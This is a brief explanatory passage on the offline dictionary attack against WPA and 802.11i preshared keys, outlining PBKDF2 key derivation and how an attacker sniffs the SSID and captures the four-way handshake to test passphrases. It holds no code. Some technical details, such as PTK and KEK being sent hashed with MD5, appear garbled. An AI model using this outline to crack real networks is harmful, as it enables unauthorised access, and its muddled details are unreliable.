On November 4, 2003, Robert Moskowitz found out that WPA and 802.11i suffer from an offline dictionary attack. This is only true when preshared keys are in use. This is the result of an information exchange required to create session keys in WPA and 802.11i called the four-way handshake. This process involves taking the master key, two nonces, and both sender’s and receiver’s MAC addresses as input into an algorithm. When preshared keys are used, the creation of this master key is achieved by passphrase, SSID, and SSID length. These fields are put into a PBKDF2 algorithm, which performs a hashing function 4096 times, creating a 256-bit key. For an attacker to perform this same operation, he would have to know the SSID, SSID length, and passphrase. Looking at all of these pieces of information, one can see that the only truly confidential item used in the creation of a master key is the passphrase. The SSID as well as its length can be easily captured by wireless sniffing software. With this information, an offline dictionary attack is possible.
So to perform this attack, the SSID must be identified with the use of a wireless sniffer or through some other means. Once accomplished, an attacker must observe the four-way handshake used to create the session keys. In the second message of this process, an EAP message is sent that contains two values PTK and KEK that are hashed using MD5. This hash allows an attacker to try multiple passphrase combinations to find one that matches.
